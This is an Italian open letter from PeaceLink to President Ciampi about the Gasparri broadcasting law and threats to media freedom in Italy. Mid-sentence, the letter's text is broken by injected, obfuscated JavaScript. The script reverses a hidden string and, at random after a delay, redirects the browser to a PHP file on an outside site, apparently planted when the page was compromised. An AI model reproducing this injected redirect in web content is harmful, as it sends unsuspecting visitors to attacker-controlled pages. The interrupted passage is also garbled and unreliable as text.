Gasparri bocciata. 'NON FERMIAMOCI!', lettera aperta a Ciampi

image_pdfimage_print

LETTERA APERTA AL PRESIDENTE DELLA REPUBBLICA: PRESIDENTE CIAMPI,

le scrivo a nome dell’associazione PeaceLink, un gruppo di volontari che
dal 1991 produce gratuitamente informazioni sulla pace e i diritti umani,
diffuse quotidianamente su internet.

La sua decisione di rinviare alle camere il disegno di legge sul riassetto
del sistema radiotelevisivo ha ridato speranza a molti cittadini che ormai
consideravano perduta la battaglia civile per una informazione libera da
condizionamenti partitici, economici, affaristici, lobbistici e mafiosi.

Sappiamo che il suo gesto ha un valore puramente simbolico, perche’ con
ogni probabilita’ la legge che lei ha giudicato incostituzionale in alcuni
passaggi verra’ approvata dopo gli opportuni ritocchi e aggiustamenti,
perche’ questo e’ quello che prevedono le regole delle istituzioni.

Tuttavia la forza di questo simbolo e il valore del suo ‘no’ ci aiutano a
ritrovare la speranza di consegnare ai nostri figli un ambiente culturale,
mediatico e cognitivo libero da tutte quelle forme di inquinamento mentale
che sua moglie Franca ha efficacemente sintetizzato col nome di
‘televisione deficiente’.

Dalle notizie di agenzia apprendiamo che nel messaggio inviato alle Camere
per motivare il rinvio del ddl Gasparri lei ha espresso preoccupazione sul
fenomeno della concentrazione del mercato pubblicitario a favore delle
concessionarie televisive Sipra e Publitalia, comunic (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}ando il timore che ‘la
radiotelevisione, inaridendo una tradizionale fonte di finanziamento della
libera stampa, rechi grave pregiudizio ad una liberta’ che la Costituzione
fa oggetto di energica tutela’.

Purtroppo i problemi dell’appiattimento culturale del piccolo schermo e
della concentrazione pubblicitaria non sono le uniche piaghe che affliggono
la nostra informazione.

Negli ultimi anni abbiamo osservato impotenti l’aumento esponenziale delle
tariffe postali che sta stroncando le piccole riviste distribuite solo su
abbonamento, la progressiva estinzione delle librerie di quartiere,
asfissiate dalle grandi catene come Feltrinelli e Mondadori, la concorrenza
sleale delle riviste e dei libri che raggiungono i supermercati e gli
autogrill danneggiando i piccoli editori che non possono permetterselo,
l’impoverimento del panorama culturale dominato dai grandi gruppi
editoriali Rcs, Caracciolo e Mondadori, le concentrazioni di poteri
mediatici che non riguardano solo il presidente del Consiglio attualmente
in carica, ma anche personaggi come Mario Ciancio, Francesco Gaetano
Caltagirone, Cesare Romiti, Maurizio Costanzo, Bruno Vespa e molti altri,
le leggi sull’editoria che penalizzano la piccola informazione libera e
decentrata e forniscono provvigioni spropositate alle riviste di partito,
le azioni legali operate a danno delle piccole ‘Tv di quartiere’, ormai
presenti a centinaia nel Paese, che aumentano la biodiversita’ televisiva
con programmi autogestiti e privi di pubblicita’, la dubbia
costituzionalita’ di organismi come la Siae che operano la
criminalizzazione della condivisione di musica e opere dell’ingegno senza
scopo di lucro, l’approvazione della direttiva europea sul copyright che
tutela unicamente il diritto al profitto di grosse aziende calpestando i
diritti degli utenti e dei consumatori, i monopoli dell’informatica e delle
telecomunicazioni che danneggiano la libera iniziativa economica, la palese
censura operata su chi viene allontanato dagli schermi televisivi, la piu’
subdola autocensura alla quale sono costretti anche nella stampa piu’
progressista migliaia di giornalisti precari, i progetti di legge per
obbligare i siti internet di informazione indipendente a registrarsi come
testate giornalistiche, la crescente ingerenza degli inserzionisti
pubblicitari nell’attivita’ delle redazioni, la subalternita’ dell’Italia
all’economia e alla cultura statunitense in ambito cinematografico,
discografico e informatico, la trasformazione delle notizie in propaganda
militare durante le recenti azioni di guerra che hanno coinvolto
direttamente o indirettamente il nostro Paese, la scomparsa dagli schermi
televisivi delle informazioni sulle manifestazioni sindacali e pacifiste,
la trasformazione del servizio pubblico televisivo in un’arena di scontro
per la conquista del potere, dove la professionalita’ dei giornalisti viene
soffocata premiando il divismo e la piaggeria, mentre le legittime
richieste dei cittadini e della societa’ civile vengono sistematicamente
ignorate.

Di fronte a tutto questo le chiediamo rispettosamente di non fermarsi e di
spingere ancora piu’ in la’ la sua azione per garantire la liberta’ di
informazione e di espressione nel Paese, denunciando come ha gia’ fatto in
altre occasioni non solo le storture e le incostituzionalita’ della legge
Gasparri o di qualunque altra legge illiberale o incostituzionale, ma ogni
limitazione del diritto a produrre e ricevere informazioni libere, un
diritto che lei stesso ha definito ‘oggetto di energica tutela’ da parte
della nostra Costituzione Repubblicana.

La situazione eccezionale che le ho descritto le richiedera’ una
eccezionale dose di coraggio e di determinazione, ma nel cercare questo
coraggio e questa determinazione deve sapere che avra’ dalla sua parte quei
milioni di cittadini italiani che vogliono continuare a pensare con la
propria testa, liberi da condizionamenti di qualunque provenienza e colore
politico.

Ringraziandola per l’attenzione che ci ha dedicato, le auguriamo buon lavoro.

Carlo Gubitosa
Associazione PeaceLink

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *